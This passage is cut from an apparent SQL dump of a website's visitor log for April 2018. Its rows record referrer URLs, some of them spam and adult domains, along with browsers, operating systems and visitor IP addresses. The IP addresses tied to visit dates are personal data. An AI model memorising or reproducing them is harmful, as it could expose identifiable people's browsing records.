=&etext=1754.vHU72cdWHHrcOU7vLdZ_YAofv_IhbM7a8p7InVvCtzM.e447d5165635c906ec927fbc5ffd1f21f7448976&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042ejJCV2k1Q3h1N1kzanREMV9GVmRIOFI2Z2ZTZDRRR0Z1UmNlaXl3Zk5yUSws&sign=1bc2289c7074f8ca2314f98729d436a2&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','164.132.137.175','000',2,0),(28652,'2018-04-11','https://med-dopomoga.com/','MSIE','Windows','5.5','','178.137.86.152','000',3,0),(28653,'2018-04-11','https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiOx5aji7LaAhWh64MKHaEJBVYQFggpMAA&url=https%3A%2F%2Fzphiblgz.org%2F&usg=AOvVaw3q4W_LfCjivY3GRWBdIE5d','MSIE','Windows','11.0','','159.142.31.91','000',4,0),(28654,'2018-04-11','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.214','000',1,0),(28655,'2018-04-11','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1754.h7KTf3h0WeBPIP8ljIVn8OpfGhYZAwTPHs6_YNf6k_k.34ef0658ab649a8a3d8af74469956059eb85940b&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042NHgyeUlJV2dkMEVoNm9WeUFNQ1A2T09zRzNRUTNfS1h6MmRtLWcxM2NEQSws&sign=d1b675e9cc40917290e8d0176bb9efe0&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.88.53','000',2,0),(28656,'2018-04-11','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.32','000',1,0),(28657,'2018-04-11','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.32','000',1,0),(28658,'2018-04-11','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1754.kuM0mEbo7ciTy7c1jJYkuW5mxW3B-c1ugNeHAEajrys.aba3428977df218e9d351c4458c86ec6b72c9ddc&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040Wlk3YThBRUpTU1kzWU1yVWVyMmRZUGlzWGlJSGdObWZMS2ZMc1NINHA3USws&sign=de49ff109bcfc0611965cefedd760afd&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.203.45.158','000',2,0),(28659,'2018-04-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.227.36.125','000',4,0),(28660,'2018-04-11','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.28','000',1,0),(28661,'2018-04-11','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.28','000',1,0),(28662,'2018-04-11','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.208.23','000',2,0),(28663,'2018-04-11','https://zphiblgz.org','Safari','iPhone','11.0','','216.99.180.244','000',2,0),(28664,'2018-04-11','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.182.12','000',2,0),(28665,'2018-04-11','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.218.17','000',2,0),(28666,'2018-04-11','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.222.154','000',2,0),(28667,'2018-04-11','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.32','000',1,0),(28668,'2018-04-11','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.218.190','000',2,0),(28669,'2018-04-11','https://www.google.com/','Chrome','Windows','65.0.3325.181','','63.138.101.192','000',2,0),(28670,'2018-04-11','https://zphiblgz.org','Chrome','Macintosh','51.0.2704.84','','199.19.224.189','000',2,0),(28671,'2018-04-11','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.188.165','000',1,0),(28672,'2018-04-11','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.212.54','000',2,0),(28673,'2018-04-11','https://www.google.com/','Chrome','Windows','65.0.3325.181','','156.40.216.3','000',4,0),(28674,'2018-04-11','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(28675,'2018-04-11','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.31','000',2,0),(28676,'2018-04-11','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.30','000',1,0),(28677,'2018-04-11','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.31','000',1,0),(28678,'2018-04-11','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.31','000',2,0),(28679,'2018-04-11','https://www.google.com/','Chrome','Windows','65.0.3325.181','','131.156.156.33','000',3,0),(28680,'2018-04-11','https://zphiblgz.org','MSIE','Windows','8.0','','195.154.252.201','000',1,0),(28681,'2018-04-11','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.27','000',1,0),(28682,'2018-04-11','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.27','000',1,0),(28683,'2018-04-11','http://www.inet-shop.su/','MSIE','Windows','6.0','','178.137.86.152','000',5,0),(28684,'2018-04-11','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',3,0),(28685,'2018-04-11','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','214.36.0.135','000',1,0),(28686,'2018-04-11','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','214.36.6.109','000',2,0),(28687,'2018-04-11','http://pornohd1080.online/','MSIE','Windows','6.0','','46.118.127.172','000',3,0),(28688,'2018-04-11','https://www.google.com/','Firefox','Windows','59.0','','99.46.254.136','000',2,0),(28689,'2018-04-11','http://zphiblgz.org/','Chrome','Windows','63.0.3239.84','','223.72.81.216','000',2,0),(28690,'2018-04-11','https://happysong.ru/','MSIE','Windows','6.0','','178.159.37.55','000',3,0),(28691,'2018-04-11','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.32','000',1,0),(28692,'2018-04-11','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.27','000',1,0),(28693,'2018-04-11','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.27','000',1,0),(28694,'2018-04-11','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.31','000',2,0),(28695,'2018-04-11','https://docs4all.com/','MSIE','Windows','6.0','','134.249.55.53','000',7,0),(28696,'2018-04-11','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.30','000',1,0),(28697,'2018-04-11','https://zphiblgz.org','Firefox','Macintosh','59.0','','50.201.151.83','000',3,0),(28698,'2018-04-11','android-app://com.google.android.googlequicksearchbox','Chrome','Android','65.0.3325.109','','73.87.137.159','000',1,0),(28699,'2018-04-11','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.35','000',1,0),(28700,'2018-04-11','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.35','000',1,0),(28701,'2018-04-11','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.31','000',1,0),(28702,'2018-04-11','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.31','000',1,0),(28703,'2018-04-11','http://www.bing.com/search?q=beta+deha+community+action+howard+county+md&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=','MSIE','Windows','9.0','','204.79.180.16','000',1,0),(28704,'2018-04-11','https://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.79','000',2,0),(28705,'2018-04-11','https://www.bing.com/','Edge','Windows','16.16299','','71.246.192.156','000',2,0),(28706,'2018-04-11','http://pk-services.ru/','MSIE','Windows','6.0','','46.119.121.22','000',2,0),(28707,'2018-04-11','https://zphiblgz.org','Chrome','Windows','59.0.3045.43','','46.119.112.226','000',1,0),(28708,'2018-04-12','https://zphiblgz.org','Chrome','Windows','41.0.2228.0','','195.201.90.237','000',3,0),(28709,'2018-04-12','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','164.132.137.175','000',2,0),(28710,'2018-04-12','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.29','000',1,0),(28711,'2018-04-12','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.29','000',1,0),(28712,'2018-04-12','http://spb-scenar.ru/','MSIE','Windows','6.0','','46.118.127.172','000',3,0),(28713,'2018-04-12','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.178.68','000',1,0),(28714,'2018-04-12','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.30','000',1,0),(28715,'2018-04-12','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.32','000',1,0),(28716,'2018-04-12','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.27','000',1,0),(28717,'2018-04-12','https://zphiblgz.org','Safari','iPhone','7.0','','131.253.27.48','000',1,0),(28718,'2018-04-12','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1755.W29YH7GXHAywvIO6mZS1-WTg9pby9d4ZJvrxRoCWr90.0f3571959406de51d770519d9b5f9f16e2eaeca3&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041RUNfeHNUdF9fYTF3Y0N6UnpFVU11VENvWnpaempacFJYSUtPc0k0MjdKQSws&sign=59d9aca6782ccb00d57a7f2b8793c9ee&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.197.187.8','000',2,0),(28719,'2018-04-12','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1755.MM7J1xopIkjn_ivmBuAUiXFiuxuBr4Ogrv0bsy13a3w.24ca06aec629e37d8b079f4b4bb0611442c4f0e8&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043cDViTXJ1enk4Ynpsck9ScGY5VWlhTS1TTzIzb2E0Z0VEX0piMU81bVVqUSws&sign=ff4c2072ee42c22e70f80d9abca9f412&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','13.229.144.141','000',2,0),(28720,'2018-04-12','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1755.8v67VHz6oAR_Mo7N8z78eQ01JPcAy_ST4nZUV0teaWg.ff0321146fdcccdb0e3c61f65b7de70433dd6d5e&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042TEROWUx3SnlIV0VJZGhzN3YtcFNFanJNWE1mWXNDeGZOMFp3MzM4WE41Zyws&sign=9bd58a2c42153ee084d1d923a414e61c&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.166.119.67','000',2,0),(28721,'2018-04-12','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1755.RZ1XTd1aNYY9tx6Jq0kj4iPehl5aIo7BmQk3Nr5hn_A.41e32c51323bdb6292b74aa8791034daa7ca788b&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041ZEwxMlBnV1JkVUJPRm5pY3hxU0lNSm1kVzVGN01wU1ZvSW9tcl9NWld0USws&sign=8d84f5601346b892ec9593918ecfca1a&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','54.202.225.109','000',2,0),(28722,'2018-04-12','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1756.9eUHmcbETWTw9j_VYpVJcqT2oHCMVC145z-oy03TyeRL1WigVUgPJW5S0AK8ULjI.1047e3fefab36b3f1529595490666d5d198a5366&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YHRNgn3KsbHJbmUkku86_mY&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV2REMmNVN0R2VGlScUpyYXUwQXliQmpUMlFSODVWdmN3OUsyUENoUXFlT2YxSmxUUENnQ2NrLUtjN3IwcEMtZU9mUFBsM1I0TXIycjlfZHhjblpibU01UUxmdGhYNi1QcnJ5WjlpbkM3UGttUmxWNk9nYlBNRA&b64e=2&sign=118bd4759391a3b0267953d2f6b9196a&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQaYgAYq7JarrAqCKC8BfTmCcFzE4CXV8DI3smEhcNCM5JZTZnj5oKj91r2KuoQUdT1EtkZaqFGYJ5hxJBzM-u89wCOoUI-d8D-S6KBDYQ7v7bcJ3mwZ8t6yEz5JXQmo4U9v8XkV1gG_h&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCX5No9jVno6g1CiiAaqgNywURbC43VN0ZzSlXAKmgblwiQNWx9QSY7uXiyJm0ffLx0nNJ3untS2Ug&l10n=ru&cts=1523528792007&mc=7.05972186887','MSIE','Windows','8.0','','37.204.157.100','000',1,0),(28723,'2018-04-12','https://zphiblgz.org','Firefox','Windows','40.1','','171.50.197.104','000',1,0),(28724,'2018-04-12','https://zphiblgz.org','Firefox','Macintosh','3.6.2','','158.69.252.227','000',2,0),(28725,'2018-04-12','http://zphiblgz.org/tag/money/','Chrome','Windows','58.0.3029.110','','188.165.4.128','000',1,0),(28726,'2018-04-12','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1755.IuhHUn5FQR4cMNumE6j0Xau7f_sbmGQHUfJPL3YmQtM.2e101e94027b539c441cbfda9dcbf7d2211d7ef8&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043cU9yM3FCZHlaa2NDeWlnQ3FWNjBMMnpyVmNXT00xSFVjaXlNSnM0WWVKQSws&sign=5fc3991a0a989c114616af4f8ae8843d&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.233.136','000',2,0),(28727,'2018-04-12','http://12u.info/','MSIE','Windows','5.5','','178.159.37.55','000',3,0),(28728,'2018-04-12','https://zphiblgz.org','Chrome','Windows','49.0.2627.54','','77.246.219.162','000',2,0),(28729,'2018-04-12','http://prosmibank.ru/','MSIE','Windows','5.0','','178.159.37.55','000',3,0),(28730,'2018-04-12','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.27','000',1,0),(28731,'2018-04-12','http://aibolita.com/','MSIE','Windows','5.5','','46.119.121.74','000',2,0),(28732,'2018-04-12','zphiblgz.org','Chrome','Windows','50.0.2661.75','','31.211.86.13','000',2,0),(28733,'2018-04-12','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.30','000',1,0),(28734,'2018-04-12','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.30','000',1,0),(28735,'2018-04-12','https://zphiblgz.org','Chrome','Linux','26.0.1410.63','','108.174.196.96','000',1,0),(28736,'2018-04-12','https://zphiblgz.org','Firefox','Windows','40.1','','41.101.41.167','000',2,0),(28737,'2018-04-12','http://veselokloun.ru/','MSIE','Windows','6.0','','178.137.81.28','000',2,0),(28738,'2018-04-12','https://zphiblgz.org','Chrome','Windows','53.0.2785.116','','35.163.12.223','000',1,0),(28739,'2018-04-12','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.29','000',1,0),(28740,'2018-04-12','https://zphiblgz.org','Firefox','Windows','40.1','','141.226.217.230','000',2,0),(28741,'2018-04-12','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',4,0),(28742,'2018-04-12','https://zphiblgz.org','Firefox','Windows','40.1','','14.139.215.178','000',2,0),(28743,'2018-04-12','http://zphiblgz.org/tag/money/','Firefox','Windows','32.1','','188.165.4.128','000',1,0),(28744,'2018-04-12','https://zphiblgz.org','Firefox','Windows','7.0.1','','162.247.72.202','000',1,0),(28745,'2018-04-12','https://www.google.com/','Chrome','Windows','65.0.3325.181','','166.91.10.210','000',3,0),(28746,'2018-04-12','https://zphiblgz.org','MSIE','Windows','11.0','','161.69.99.11','000',2,0),(28747,'2018-04-12','https://zphiblgz.org','python-requests','Unknown','2.18.4','','209.150.108.10','000',1,0),(28748,'2018-04-12','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','138.246.253.19','000',1,0),(28749,'2018-04-12','https://www.google.com/url?sa=i&rct=j&q=&esrc=s&source=images&cd=&ved=2ahUKEwjw1v7x6LXaAhUGVN8KHbGjBm4Qjxx6BAgAEAI&url=https%3A%2F%2Fzphiblgz.org%2Fhistory%2F&psig=AOvVaw171EIChaOcazLMBBXsWFr0&ust=1523659706155970','MSIE','Windows','11.0','','104.129.194.70','000',2,0),(28750,'2018-04-12','https://office2web.com/','MSIE','Windows','5.5','','5.248.253.101','000',3,0),(28751,'2018-04-12','https://www.google.com/','Safari','iPhone','11.0','','71.244.199.186','000',4,0),(28752,'2018-04-12','https://www.google.com/','Safari','iPhone','11.0','','68.134.66.188','000',9,0),(28753,'2018-04-12','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.183.165.74','000',2,0),(28754,'2018-04-12','http://www.regionshop.biz/','MSIE','Unknown','6.0','','178.137.164.67','000',2,0),(28755,'2018-04-12','https://med-dopomoga.com/','Opera','Windows','9.00','','46.119.121.74','000',2,0),(28756,'2018-04-12','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.89','','104.131.19.168','000',2,0),(28757,'2018-04-12','android-app://com.google.android.googlequicksearchbox','Chrome','Android','65.0.3325.109','','97.99.210.144','000',5,0),(28758,'2018-04-12','https://zphiblgz.org','Firefox','Windows','40.1','','179.53.137.155','000',2,0),(28759,'2018-04-12','https://zphiblgz.org','AppleWebKit','Windows','534','','131.253.27.4','000',1,0),(28760,'2018-04-13','https://zphiblgz.org','Firefox','Macintosh','59.0','','216.145.14.142','000',2,0),(28761,'2018-04-13','https://zphiblgz.org/','Opera Next','Windows','49.0.2725.47','','31.130.4.240','000',2,0),(28762,'2018-04-13','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','178.62.98.169','000',2,0),(28763,'2018-04-13','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',11,0),(28764,'2018-04-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','94.23.6.167','000',2,0),(28765,'2018-04-13','https://picturesmania.com/','MSIE','Windows','6.0','','46.119.121.74','000',6,0),(28766,'2018-04-13','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.32','000',1,0),(28767,'2018-04-13','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.30','000',1,0),(28768,'2018-04-13','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.30','000',1,0),(28769,'2018-04-13','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.31','000',1,0),(28770,'2018-04-13','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.89','','104.131.19.168','000',2,0),(28771,'2018-04-13','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1756.3C_P589kjvc-v9l0h3_o5BIrzp1jmr_meQaTnOwmOh8.5b1fa3dd374ab057c71421e80592c8f82af5c05e&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043Y0NCR3NmdVh2MFdlZGJzc2xkWTQ4VFpZYUpIak9sRWZla0JISlZLc2s3dyws&sign=69510d3656e4f67317c568bdc4dd011e&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','34.217.72.127','000',2,0),(28772,'2018-04-13','https://zphiblgz.org','Firefox','Windows','57.0','','192.198.80.227','000',1,0),(28773,'2018-04-13','https://zphiblgz.org','Firefox','Windows','40.1','','85.254.142.230','000',2,0),(28774,'2018-04-13','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.32','000',1,0),(28775,'2018-04-13','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1756.7wF09TQT-nOqqvDP5ygFQ4voO7Pd91YgjzEw-jtBSe8.7e00c0dab9b2ec78091e92c4b8d574548a2ef230&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040NGoxUWpLcVNOVHJyN19WcHp6QlpmaWJzUlVUc3Q0TXFmaTh6N1F1Y0J1Zyws&sign=3e5d8eee306e806d0e24ccbddd54569a&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','35.182.144.116','000',2,0),(28776,'2018-04-13','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1756.J50IiVGZ8I3xz1e6IBeEBPMpl6qn-t042-FMR4XkODY.cb84fead14fead281439de88171f5b493aa4edee&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043amxMZ0RkeV9KRGcxeW5XMUljTER1dk0wYU1GNnVkWWhpMWhyMTV3VGhQQSws&sign=c7dbb57f53a81bd75edaf8c4995c1458&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','35.178.30.246','000',2,0),(28777,'2018-04-13','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.27','000',1,0),(28778,'2018-04-13','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1756.tTPvjt6_NNCphgpGM_5kczoXCppw5TQgw6kNUurmnaE.657f671bff6cecfd7e108791c9fc61121659a979&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043NUQ5d2VEbFlVRWNaMzFrZjQ1MXctMlFpYWp5TVdxMzdsQ3FLVDRIWTlPQSws&sign=652e98794ad189a5f577c9f480f3dd21&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','139.59.125.203','000',2,0),(28779,'2018-04-13','http://dentuled.net/','MSIE','Windows','5.5','','178.137.81.28','000',2,0),(28780,'2018-04-13','https://www.bing.com/','MSIE','Windows','11.0','','167.102.191.10','000',8,0),(28781,'2018-04-13','https://www.google.com/','Safari','iPhone','11.0','','65.158.62.46','000',4,0),(28782,'2018-04-13','https://zphiblgz.org','Safari','iPhone','11.0','','174.205.2.95','000',2,0),(28783,'2018-04-13','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','69.4.92.158','000',2,0),(28784,'2018-04-13','https://www.google.com/','Safari','iPhone','11.0','','100.36.61.191','000',12,0),(28785,'2018-04-13','https://univerfiles.com/','MSIE','Windows','6.0','','37.115.112.228','000',5,0),(28786,'2018-04-13','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.31','000',1,0),(28787,'2018-04-13','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.31','000',1,0),(28788,'2018-04-13','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.32','000',2,0),(28789,'2018-04-13','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.32','000',1,0),(28790,'2018-04-13','https://zphiblgz.org/','Chrome','Windows','55.0.2883.87','','31.130.4.240','000',2,0),(28791,'2018-04-13','zphiblgz.org','Chrome','Windows','5.0.375.99','','185.98.7.226','000',1,0),(28792,'2018-04-13','http://zphiblgz.org','MSIE','Windows','9.0','','107.178.194.41','000',1,0),(28793,'2018-04-13','https://zphiblgz.org','MSIE','Windows','6.0','','178.62.99.175','000',1,0),(28794,'2018-04-13','https://zphiblgz.org','Firefox','Macintosh','52.0','','35.205.251.6','000',42,0),(28795,'2018-04-13','https://zphiblgz.org','MSIE','Windows','8.0','','54.89.54.218','000',2,0),(28796,'2018-04-13','https://zphiblgz.org/','Firefox','Windows','39.1','','31.130.4.240','000',2,0),(28797,'2018-04-13','https://zphiblgz.org','Chrome','Linux','66.0.3349.0','','137.226.113.33','000',2,0),(28798,'2018-04-13','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.178.92','000',1,0),(28799,'2018-04-13','https://zphiblgz.org','Python-urllib','Unknown','2.7','','118.219.252.199','000',1,0),(28800,'2018-04-13','https://zphiblgz.org','MSIE','Windows','9.0','','51.15.46.174','000',3,0),(28801,'2018-04-13','https://zphiblgz.org','Firefox','Macintosh','41.0','','94.176.148.35','000',1,0),(28802,'2018-04-13','https://zphiblgz.org','MSIE','Windows','9.0','','196.52.10.29','000',20,0),(28803,'2018-04-13','https://zphiblgz.org','python-requests','Unknown','2.13.0','','51.15.46.174','000',2,0),(28804,'2018-04-13','https://zphiblgz.org','MSIE','Windows','9.0','','5.153.234.83','000',20,0),(28805,'2018-04-13','https://zphiblgz.org','MSIE','Windows','9.0','','185.230.125.50','000',14,0),(28806,'2018-04-13','https://zphiblgz.org','MSIE','Windows','9.0','','196.52.10.26','000',20,0),(28807,'2018-04-13','https://zphiblgz.org','MSIE','Windows','9.0','','86.105.9.170','000',5,0),(28808,'2018-04-13','https://zphiblgz.org','MSIE','Windows','9.0','','185.225.208.21','000',6,0),(28809,'2018-04-13','https://zphiblgz.org','MSIE','Windows','9.0','','23.92.127.10','000',20,0),(28810,'2018-04-13','https://univerfiles.com/','MSIE','Windows','6.0','','178.137.165.1','000',5,0),(28811,'2018-04-13','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',5,0),(28812,'2018-04-13','https://scat.porn/','Unknown','Unknown','Unknown','','178.137.81.28','000',2,0),(28813,'2018-04-13','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.32','000',1,0),(28814,'2018-04-13','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.32','000',1,0),(28815,'2018-04-13','https://4inn.ru/','Opera','Windows','7.11','','5.248.253.101','000',3,0),(28816,'2018-04-13','https://zphiblgz.org','Safari','iPhone','11.0','','108.15.43.53','000',3,0),(28817,'2018-04-13','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.32','000',1,0),(28818,'2018-04-13','https://zphiblgz.org/','Firefox','Linux','58.0','','149.202.50.209','000',1,0),(28819,'2018-04-13','https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=23&cad=rja&uact=8&ved=0ahUKEwjRyICrjLjaAhWrct8KHQo6DyA4FBAWCDMwAg&url=https%3A%2F%2Fzphiblgz.org%2F&usg=AOvVaw3q4W_LfCjivY3GRWBdIE5d','MSIE','Windows','11.0','','166.94.3.102','000',2,0),(28820,'2018-04-13','https://zphiblgz.org','Chrome','Linux','45.0.2472.23','','104.144.231.22','000',2,0),(28821,'2018-04-13','http://m.facebook.com','AppleWebKit','iPhone','604.5.6','','96.244.213.109','000',1,0),(28822,'2018-04-13','https://studentguide.ru/','MSIE','Windows','2.0d','','178.159.37.55','000',3,0),(28823,'2018-04-13','https://documentbase.net/','MSIE','Windows','2.0d','','178.137.165.1','000',1,0),(28824,'2018-04-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.26','000',4,0),(28825,'2018-04-13','https://zphiblgz.org','Firefox','Windows','40.1','','105.71.128.179','000',2,0),(28826,'2018-04-13','https://zphiblgz.org','python-requests','Unknown','2.18.4','','